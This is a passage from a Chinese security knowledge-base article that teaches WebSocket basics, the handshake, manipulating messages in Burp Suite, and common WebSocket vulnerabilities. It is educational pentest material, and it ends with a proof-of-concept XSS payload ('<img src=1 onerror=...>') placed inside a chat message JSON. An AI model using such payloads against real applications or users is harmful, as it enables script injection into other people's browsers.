<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <title>WebSocket安全问题分析 | 狼组安全团队公开知识库</title>
    <meta name="description" content="">
    <meta name="generator" content="VuePress 1.7.1">
    <link rel="icon" href="/assets/logo.svg">
    <script type="text/javascript" src="/assets/js/push.js"></script>
    <meta name="description" content="致力于打造信息安全乌托邦">
    <meta name="referrer" content="never">
    <meta name="keywords" content="知识库,公开知识库,狼组,狼组安全团队知识库,knowledge">
    <link rel="preload" href="/assets/css/0.styles.32ca519c.css" as="style"><link rel="preload" href="/assets/js/app.f7464420.js" as="script"><link rel="preload" href="/assets/js/2.26207483.js" as="script"><link rel="preload" href="/assets/js/82.7d17e5c8.js" as="script"><link rel="prefetch" href="/assets/js/10.55514509.js"><link rel="prefetch" href="/assets/js/11.ec576042.js"><link rel="prefetch" href="/assets/js/12.a5584a2f.js"><link rel="prefetch" href="/assets/js/13.c9f84b2e.js"><link rel="prefetch" href="/assets/js/14.d2a5440c.js"><link rel="prefetch" href="/assets/js/15.2f271296.js"><link rel="prefetch" href="/assets/js/16.0895ce42.js"><link rel="prefetch" href="/assets/js/17.627e2976.js"><link rel="prefetch" href="/assets/js/18.73745a4c.js"><link rel="prefetch" href="/assets/js/19.19350186.js"><link rel="prefetch" href="/assets/js/20.e4eac589.js"><link rel="prefetch" href="/assets/js/21.fc0657ba.js"><link rel="prefetch" href="/assets/js/22.f4a1220f.js"><link rel="prefetch" href="/assets/js/23.c8cce92d.js"><link rel="prefetch" href="/assets/js/24.46225ec2.js"><link rel="prefetch" href="/assets/js/25.9b6d75e4.js"><link rel="prefetch" href="/assets/js/26.288f535e.js"><link rel="prefetch" href="/assets/js/27.865bdc75.js"><link rel="prefetch" href="/assets/js/28.f4224fef.js"><link rel="prefetch" href="/assets/js/29.6393a40b.js"><link rel="prefetch" href="/assets/js/3.a509f503.js"><link rel="prefetch" href="/assets/js/30.d5a49f97.js"><link rel="prefetch" href="/assets/js/31.eb3647df.js"><link rel="prefetch" href="/assets/js/32.7f48a571.js"><link rel="prefetch" href="/assets/js/33.1f374ffa.js"><link rel="prefetch" href="/assets/js/34.5a911179.js"><link rel="prefetch" href="/assets/js/35.d2bcc7ef.js"><link rel="prefetch" href="/assets/js/36.42e440bd.js"><link rel="prefetch" href="/assets/js/37.dedbbdea.js"><link rel="prefetch" href="/assets/js/38.d68d1f69.js"><link rel="prefetch" href="/assets/js/39.e278f860.js"><link rel="prefetch" href="/assets/js/4.35636da8.js"><link rel="prefetch" href="/assets/js/40.97f4e937.js"><link rel="prefetch" href="/assets/js/41.38630688.js"><link rel="prefetch" href="/assets/js/42.cae56aa5.js"><link rel="prefetch" href="/assets/js/43.61a04b16.js"><link rel="prefetch" href="/assets/js/44.5c6230f2.js"><link rel="prefetch" href="/assets/js/45.0f1355ae.js"><link rel="prefetch" href="/assets/js/46.c1906649.js"><link rel="prefetch" href="/assets/js/47.7ae220ce.js"><link rel="prefetch" href="/assets/js/48.59af224e.js"><link rel="prefetch" href="/assets/js/49.6a33a171.js"><link rel="prefetch" href="/assets/js/5.08ab40ee.js"><link rel="prefetch" href="/assets/js/50.f14601d2.js"><link rel="prefetch" href="/assets/js/51.f20841fd.js"><link rel="prefetch" href="/assets/js/52.fb0a5327.js"><link rel="prefetch" href="/assets/js/53.8013048c.js"><link rel="prefetch" href="/assets/js/54.d132c2f8.js"><link rel="prefetch" href="/assets/js/55.87aa8b5d.js"><link rel="prefetch" href="/assets/js/56.161f38ad.js"><link rel="prefetch" href="/assets/js/57.bd6a2ef2.js"><link rel="prefetch" href="/assets/js/58.8a69f15a.js"><link rel="prefetch" href="/assets/js/59.93c0e2de.js"><link rel="prefetch" href="/assets/js/6.fda5ce3a.js"><link rel="prefetch" href="/assets/js/60.10091d44.js"><link rel="prefetch" href="/assets/js/61.cd1e3b10.js"><link rel="prefetch" href="/assets/js/62.9c0ad8c5.js"><link rel="prefetch" href="/assets/js/63.4a8dd9d2.js"><link rel="prefetch" href="/assets/js/64.6bf3fede.js"><link rel="prefetch" href="/assets/js/65.7a2ccc50.js"><link rel="prefetch" href="/assets/js/66.874d563b.js"><link rel="prefetch" href="/assets/js/67.bb86eab2.js"><link rel="prefetch" href="/assets/js/68.c1db2a2b.js"><link rel="prefetch" href="/assets/js/69.8141480b.js"><link rel="prefetch" href="/assets/js/7.d1fe6bef.js"><link rel="prefetch" href="/assets/js/70.9fb74c80.js"><link rel="prefetch" href="/assets/js/71.d1e4e9ab.js"><link rel="prefetch" href="/assets/js/72.e6bf83fb.js"><link rel="prefetch" href="/assets/js/73.6dd6c980.js"><link rel="prefetch" href="/assets/js/74.3612ba47.js"><link rel="prefetch" href="/assets/js/75.6e1a2434.js"><link rel="prefetch" href="/assets/js/76.5bfa4bcc.js"><link rel="prefetch" href="/assets/js/77.784df031.js"><link rel="prefetch" href="/assets/js/78.aa94a0a0.js"><link rel="prefetch" href="/assets/js/79.c4e9a4f2.js"><link rel="prefetch" href="/assets/js/8.63fd05d7.js"><link rel="prefetch" href="/assets/js/80.8d47d1f7.js"><link rel="prefetch" href="/assets/js/81.1160b022.js"><link rel="prefetch" href="/assets/js/83.a2ff144a.js"><link rel="prefetch" href="/assets/js/84.53d29383.js"><link rel="prefetch" href="/assets/js/9.b49161a4.js">
    <link rel="stylesheet" href="/assets/css/0.styles.32ca519c.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container"><header class="navbar"><div class="ant-row"><div class="nav-button"><i aria-label="icon: bars" class="anticon anticon-bars"><svg viewBox="0 0 1024 1024" focusable="false" data-icon="bars" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M912 192H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zM104 228a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0z"></path></svg></i> <span></span></div> <div class="ant-col ant-col-xs-24 ant-col-sm-24 ant-col-md-6 ant-col-lg-5 ant-col-xl-5 ant-col-xxl-4"><a href="/" class="router-link-active home-link"><img src="/assets/logo.svg" alt="狼组安全团队公开知识库" class="logo"> <span class="site-name">狼组安全团队公开知识库</span></a> <div class="search-box mobile-search"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div></div> <div class="ant-col ant-col-xs-0 ant-col-sm-0 ant-col-md-18 ant-col-lg-19 ant-col-xl-19 ant-col-xxl-20"><div class="search-box"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div> <nav class="nav-links can-hide"><ul role="menu" id="nav" class="ant-menu ant-menu-horizontal ant-menu-root ant-menu-light"><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/" class="router-link-active">
          首页
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/guide/">
          使用指南
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/knowledge/" class="router-link-active">
          知识库
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/opensource/">
          开源项目
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="visibility:hidden;position:absolute;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li></ul> <a href="https://github.com/wgpsec" target="_blank" rel="noopener noreferrer" class="repo-link"><i aria-label="icon: github" class="anticon anticon-github"><svg viewBox="64 64 896 896" focusable="false" data-icon="github" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M511.6 76.3C264.3 76.2 64 276.4 64 523.5 64 718.9 189.3 885 363.8 946c23.5 5.9 19.9-10.8 19.9-22.2v-77.5c-135.7 15.9-141.2-73.9-150.3-88.9C215 726 171.5 718 184.5 703c30.9-15.9 62.4 4 98.9 57.9 26.4 39.1 77.9 32.5 104 26 5.7-23.5 17.9-44.5 34.7-60.8-140.6-25.2-199.2-111-199.2-213 0-49.5 16.3-95 48.3-131.7-20.4-60.5 1.9-112.3 4.9-120 58.1-5.2 118.5 41.6 123.2 45.3 33-8.9 70.7-13.6 112.9-13.6 42.4 0 80.2 4.9 113.5 13.9 11.3-8.6 67.3-48.8 121.3-43.9 2.9 7.7 24.7 58.3 5.5 118 32.4 36.8 48.9 82.7 48.9 132.3 0 102.2-59 188.1-200 212.9a127.5 127.5 0 0 1 38.1 91v112.5c.8 9 0 17.9 15 17.9 177.1-59.7 304.6-227 304.6-424.1 0-247.2-200.4-447.3-447.5-447.3z"></path></svg></i></a></nav></div></div> <!----></header> <aside class="sidebar"><div><div class="promo"><div id="promo_3"><div class="promo_title">赞助商</div> <button type="button" class="ant-btn ant-btn-primary ant-btn-background-ghost"><span>成为赞助商</span></button></div></div> <div role="separator" id="reset-margin" class="ant-divider ant-divider-horizontal ant-divider-dashed"></div></div> <ul class="sidebar-links"><li><a href="/knowledge/" aria-current="page" title="知识库广告位招租" class="sidebar-link">知识库广告位招租</a></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>CTF</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>基础知识</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>工具手册</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading open"><span>Web安全</span> <span class="arrow down"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <ul class="sidebar-links sidebar-group-items"><li><a href="/knowledge/web/" aria-current="page" title="分类简介" class="sidebar-link">分类简介</a></li><li><a href="/knowledge/web/unauthorized.html" title="未授权访问总结" class="sidebar-link">未授权访问总结</a></li><li><a href="/knowledge/web/infoleak.html" title="信息泄露漏洞" class="sidebar-link">信息泄露漏洞</a></li><li><a href="/knowledge/web/fileuploads.html" title="文件上传漏洞" class="sidebar-link">文件上传漏洞</a></li><li><a href="/knowledge/web/fileincludes.html" title="文件包含漏洞" class="sidebar-link">文件包含漏洞</a></li><li><a href="/knowledge/web/cmd_injection.html" title="命令注入漏洞" class="sidebar-link">命令注入漏洞</a></li><li><a href="/knowledge/web/logical.html" title="常见逻辑漏洞" class="sidebar-link">常见逻辑漏洞</a></li><li><a href="/knowledge/web/csrf-ssrf.html" title="请求伪造漏洞" class="sidebar-link">请求伪造漏洞</a></li><li><a href="/knowledge/web/same-origin-policy.html" title="同源策略和域安全" class="sidebar-link">同源策略和域安全</a></li><li><a href="/knowledge/web/xss.html" title="XSS 跨站脚本漏洞" class="sidebar-link">XSS 跨站脚本漏洞</a></li><li><a href="/knowledge/web/xxe.html" title="XML实体注入漏洞" class="sidebar-link">XML实体注入漏洞</a></li><li><a href="/knowledge/web/sql_injection.html" title="SQL注入漏洞" class="sidebar-link">SQL注入漏洞</a></li><li><a href="/knowledge/web/mysql-write-shell.html" title="MySQL写shell" class="sidebar-link">MySQL写shell</a></li><li><a href="/knowledge/web/websocket-sec.html" aria-current="page" title="WebSocket安全问题分析" class="active sidebar-link">WebSocket安全问题分析</a></li></ul></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>攻防对抗</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>代码审计</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li></ul></aside> <main class="page"> <div class="theme-antdocs-content content__default"><h1 id="websocket安全问题分析-一-什么是websocket">WebSocket安全问题分析(一)——什么是WebSocket？ <a href="#websocket安全问题分析-一-什么是websocket" class="header-anchor">#</a></h1> <h2 id="一、什么是websocket">一、什么是WebSocket？ <a href="#一、什么是websocket" class="header-anchor">#</a></h2> <p>WebSocket是通过HTTP协议发起的一个双向全双工的通信协议。WebSocket协议被广泛用在现代WEB程序中用于数据流的传输和异步通信。</p> <p><img src="https://portswigger.net/web-security/images/websockets.svg#align=left&amp;display=inline&amp;height=440&amp;margin=%5Bobject%20Object%5D&amp;originHeight=440&amp;originWidth=781&amp;status=done&amp;style=none&amp;width=781" alt=""></p> <h2 id="二、websocket和http的区别">二、WebSocket和HTTP的区别 <a href="#二、websocket和http的区别" class="header-anchor">#</a></h2> <p>大多数的Web浏览器和Web网站都是使用HTTP协议进行通信的。通过HTTP协议，客户端发送一个HTTP请求，然后服务器返回一个响应。通常来说，服务端返回一个响应后，这个HTTP请求事务就已经完成了。即使这个HTTP连接处于keep-alive的状态，它们之间的每一个工作(事务)依然是请求与响应，请求来了，响应回去了。这个事务就结束了。所以通常来说，HTTP协议是一个基于事务性的通信协议。</p> <p>而WebSocket呢，它通常是由HTTP请求发起建立的，建立连接后，会始终保持连接状态。客户端和服务端可以随时随地的通过一个WebSocket互发消息，没有所谓事务性的特点。这里要注意了，源于其双向全双工的通信特点，在一个WebSocket连接中，服务端是可以主动发送消息的哦，这一点已经完全区别于HTTP协议了。</p> <p>因此，基于以上特点，WebSocket通常用于低延迟和允许服务器发送消息的场景。例如，金融行业常用WebSocket来传输实时更新的数据。</p> <h2 id="三、websocket的建立">三、WebSocket的建立 <a href="#三、websocket的建立" class="header-anchor">#</a></h2> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code><span class="token keyword">var</span> ws <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">WebSocket</span><span class="token punctuation">(</span><span class="token string">&quot;wss://normal-website.com/chat&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><blockquote><p>wss协议通过TLS连接建立一个WebSocket；ws协议是不经过加密的连接。</p></blockquote> <h2 id="四、websocket握手">四、WebSocket握手 <a href="#四、websocket握手" class="header-anchor">#</a></h2> <blockquote><p>通过HTTP协议，客户端和服务端进行一个WebSocket握手。</p></blockquote> <p>客户端的握手请求：</p> <div class="language-http line-numbers-mode"><pre class="language-http"><code><span class="token request-line"><span class="token property">GET</span> /chat HTTP/1.1</span>
<span class="token header-name keyword">Host:</span> normal-website.com
<span class="token header-name keyword">Sec-WebSocket-Version:</span> 13
<span class="token header-name keyword">Sec-WebSocket-Key:</span> wDqumtseNBJdhkihL6PW7w==
<span class="token header-name keyword">Connection:</span> keep-alive, Upgrade
<span class="token header-name keyword">Cookie:</span> session=KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2
<span class="token header-name keyword">Upgrade:</span> websocket
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><p>如果服务端接受这个连接，它会返回一个WebSocket回复：</p> <div class="language-http line-numbers-mode"><pre class="language-http"><code><span class="token response-status">HTTP/1.1 <span class="token property">101 Switching Protocols</span></span>
<span class="token header-name keyword">Connection:</span> Upgrade
<span class="token header-name keyword">Upgrade:</span> websocket
<span class="token header-name keyword">Sec-WebSocket-Accept:</span> 0FFP+2nmNIf/h+4BP36k9uzrYGk=
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p>之后，这个WebSocket的网络连接会保持开启状态，任意一方都可以直接发送WebSocket信息。</p> <blockquote><p>关于WebSocket握手时的一些特性：</p> <ul><li><code>Connection</code>和<code>Upgrade</code>头部用来标识这是一个WebSocket握手消息。</li> <li><code>Sec-WebSocket-Version</code>请求头明确了一个客户端希望使用的WebSocket协议版本。版本<code>13</code>最常用。</li> <li><code>Sec-WebSocket-Key</code>请求头包含了一个base64编码的随机值，在每个WebSocket握手请求中，它一定是随机生成的。</li> <li><code>Sec-WebSocket-Accept</code>响应头的值是客户端发送的握手请求中<code>Sec-WebSocket-key</code>的哈希值，并与协议规范中定义的特定字符串连接。这样做的目的是匹配每一对握手请求，防止由于错误的配置或者缓存代理导致的连接错误。</li></ul></blockquote> <h2 id="五、websocket的消息体是什么样的">五、WebSocket的消息体是什么样的？ <a href="#五、websocket的消息体是什么样的" class="header-anchor">#</a></h2> <p>一旦一个WebSocket建立成功后，客户端和服务端任意一方都可以立即异步的发送消息。</p> <p>例如，客户端可以通过JavaScirpt来简单的发送一个的消息：</p> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code>ws<span class="token punctuation">.</span><span class="token function">send</span><span class="token punctuation">(</span><span class="token string">&quot;From WgpSec.2h0ng.&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>本质上，WebSocket消息体可以包含任意数据格式的内容。在现代应用程序中，通过WebSocket发送JSON格式的消息体比较常见。</p> <p>例如，一个聊天机器人的WEB程序可以使用WebSocket发送如下的内容:</p> <div class="language-json line-numbers-mode"><pre class="language-json"><code><span class="token punctuation">{</span><span class="token property">&quot;user&quot;</span><span class="token operator">:</span><span class="token string">&quot;2h0ng&quot;</span><span class="token punctuation">,</span><span class="token property">&quot;content&quot;</span><span class="token operator">:</span><span class="token string">&quot;Hello 2h0ng!&quot;</span><span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h1 id="webscoket安全问题分析-二-如何操控websocket">WebScoket安全问题分析(二)——如何操控WebSocket <a href="#webscoket安全问题分析-二-如何操控websocket" class="header-anchor">#</a></h1> <blockquote><p>寻找WebSockets的安全漏洞最常用的方法就是，操纵WebSocket的通信流，通过非预期的输入来进行安全测试。本章节主要讨论，如何操纵WebSocket的通信流，以及和操纵普通的HTTP通信相比，操控WebSocket通信时要注意哪些问题。</p></blockquote> <ul><li>拦截和修改WebSocket信息</li> <li>重放和生成一个新的WebSocket消息</li> <li>操控WebSocket连接</li></ul> <h2 id="一、拦截和修改websocket消息">一、拦截和修改WebSocket消息 <a href="#一、拦截和修改websocket消息" class="header-anchor">#</a></h2> <p>和HTTP报文的测试流程一样，你可以使用Burp Proxy来拦截和修改WebSocket消息。</p> <ul><li>配置你的浏览器使用Burp Suite作为它的代理服务器</li> <li>Proxy -&gt; Intrecept is on，测试使用WebSocket的功能点，拦截后，你可以查看或者修改它。</li></ul> <p><img src="https://cdn.nlark.com/yuque/0/2021/png/12876037/1616660391938-26e2fa60-9906-4f10-b77f-62537793feb8.png?x-oss-process=image%2Fresize%2Cw_1462#align=left&amp;display=inline&amp;height=1028&amp;margin=%5Bobject%20Object%5D&amp;originHeight=1028&amp;originWidth=1462&amp;status=done&amp;style=none&amp;width=1462" alt=""></p> <ul><li>Proxy -&gt; Intrecept is off，测试使用WebSocket的功能点，然后你可以在Proxy -&gt; WebSockets history中查看历史发送与接受的WebSocket消息。</li></ul> <p><img src="https://cdn.nlark.com/yuque/0/2021/png/12876037/1616660475345-1be651c4-b1d5-4154-bf24-4731bf337470.png?x-oss-process=image%2Fresize%2Cw_1462#align=left&amp;display=inline&amp;height=1030&amp;margin=%5Bobject%20Object%5D&amp;originHeight=1030&amp;originWidth=1462&amp;status=done&amp;style=none&amp;width=1462" alt=""></p> <blockquote><p>注意：你可以在Proxy -&gt; Options -&gt; Intercept WebSockets Messages 中配置只拦截客户端 -&gt; 服务端， 或者服务端 -&gt;  客户端方向的WebSocket消息。（默认情况下两个方向都拦截）</p></blockquote> <h2 id="二、重放和生成一个新的websocket消息">二、重放和生成一个新的WebSocket消息 <a href="#二、重放和生成一个新的websocket消息" class="header-anchor">#</a></h2> <p>除了拦截和修改一个WebSocket消息之外，你可能也需要重放或者新生成一个WebSocket消息。你可以通过Burp Repeater来实现这些（<strong>注意：WebSocket的Repeater面板UI界面不一样，增加了很多小功能，比如管理WebSocket连接、已经重放的消息历史，师傅们可以自己体验一下！</strong>）：</p> <ul><li>在Burp Proxy中，在Intercept标签或者WebSockets history中选择一个WebSocket消息，右键发送到Repeater中。</li> <li>在Burp Repeater中，你可以编辑被选择的WebSocket消息，然后再次发送它。</li> <li>你也可以在Repeater输入一个新的WebSocket消息然后将它发送给任一方向，给你的客户端(浏览器)或者是服务端。</li> <li>在WebSocket Repeater独有的History中，你可以看到我们通过WebSocket连接向客户端(浏览器)或者服务端重发的消息。同时，你也可以选择这个History中的消息进行编辑和重放</li></ul> <p><img src="https://cdn.nlark.com/yuque/0/2021/png/12876037/1616660516297-8b5f0e42-982c-4a6d-8975-21e4749a1573.png?x-oss-process=image%2Fresize%2Cw_1462#align=left&amp;display=inline&amp;height=1028&amp;margin=%5Bobject%20Object%5D&amp;originHeight=1028&amp;originWidth=1462&amp;status=done&amp;style=none&amp;width=1462" alt=""></p> <h2 id="三、操控websocket连接">三、操控WebSocket连接 <a href="#三、操控websocket连接" class="header-anchor">#</a></h2> <p>当然，除了操控WebSocket双向中传递的消息体之外，我们也可以操纵WebSocket的握手环节。这可以引入一些有趣的高级的攻击手法。例如：WebSocket跨域劫持，这会在第四章节中讲解。</p> <p>有很多场景下，操控WebSocket握手连接是非常有必要的：</p> <ul><li>它可以扩展你的攻击面</li> <li>一些攻击手法可能会导致你的连接断开，所以你需要去重新建立一个新的连接</li> <li>Token或者其它的数据在原始的握手请求中可能被窃取或者需要更新</li></ul> <p>你可以通过刚才讲到的Burp Repeater操控WebSocket握手：</p> <ul><li>发送一个WebSocket消息到Burp Repeater中。</li> <li>在Burp Repeater中，点击消息框右上角的小铅笔图标，选择一个WebSocket URL。然后在这个功能栏的下边你可以选择接入已经建立连接的WebSocket、克隆已经建立连接的WebSocket、或者重新连接一个已经断开连接的WebSocket。然后向导会根据你的操作给你一个详细的步骤，跟着做，修改消息体、或者是输入一个新的握手包。</li> <li>输入或修改结束后点击Connect，Burp会发送你的配置的握手包，然后展示详细的执行结果。如果一个新的WebSocket连接被成功的建立，你可以在Repeater中来通过这个Socket发送新的消息包。</li></ul> <p><img src="https://cdn.nlark.com/yuque/0/2021/png/12876037/1616660634784-3be43a32-2a81-4aa6-935f-654076a2aed2.png?x-oss-process=image%2Fresize%2Cw_1462#align=left&amp;display=inline&amp;height=1028&amp;margin=%5Bobject%20Object%5D&amp;originHeight=1028&amp;originWidth=1462&amp;status=done&amp;style=none&amp;width=1462" alt=""></p> <h1 id="websocket安全问题分析-三-常见的websocket漏洞案例">WebSocket安全问题分析(三)——常见的WebSocket漏洞案例 <a href="#websocket安全问题分析-三-常见的websocket漏洞案例" class="header-anchor">#</a></h1> <blockquote><p>实际上，几乎所有的Web漏洞都有可能出现在WebSocket中。因为，WebSocket本质上就是一个通过HTTP建立连接的双向全双工的通信协议而已，但由于其相比HTTP多了一“工”的特性，可能会出现一些新的攻击场景。</p></blockquote> <p>常见的攻击场景如下：</p> <ul><li>用户的输入被服务器以不安全的方式进行处理，导致了例如SQL注入、XXE等注入攻击。</li> <li>一些盲注漏洞可能会通过WebSocket引起，可以利用<a href="https://portswigger.net/blog/oast-out-of-band-application-security-testing" target="_blank" rel="noopener noreferrer">带外技术<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>进行探测。</li> <li>如果攻击者控制的数据通过WebSocket传输到了其它用户的客户端处，这可能会引起XSS或者其它客户端类型的漏洞。</li></ul> <h2 id="一、操控websocket消息体寻找漏洞">一、操控WebSocket消息体寻找漏洞 <a href="#一、操控websocket消息体寻找漏洞" class="header-anchor">#</a></h2> <p>通过篡改 WebSocket 消息的内容，可以发现并利用大多数基于输入的漏洞。</p> <p>例如，一个具有聊天功能的Web程序使用WebSocket在客户端和服务端之间传输消息。当一个用户输入聊天消息时，如下的一个WebSocket消息被发送到服务端：</p> <div class="language-json line-numbers-mode"><pre class="language-json"><code><span class="token punctuation">{</span><span class="token property">&quot;message&quot;</span><span class="token operator">:</span><span class="token string">&quot;Hello Tom！&quot;</span><span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>服务端会将这个消息内容通过WebSocket转发给另外一个用户Tom，然后在Tom的浏览器中被JS渲染为一段HTML代码。</p> <div class="language-html line-numbers-mode"><pre class="language-html"><code><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>td</span><span class="token punctuation">&gt;</span></span>Hello Carlos<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>td</span><span class="token punctuation">&gt;</span></span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>当服务器没有对转发的内容做安全防御或过滤时，可能就会引发XSS攻击。</p> <div class="language-json line-numbers-mode"><pre class="language-json"><code><span class="token punctuation">{</span><span class="token property">&quot;message&quot;</span><span class="token operator">:</span><span class="token string">&quot;&lt;img src=1 onerror='alert(1)'&gt;&quot;</span><span class="token punctuation">}</span>
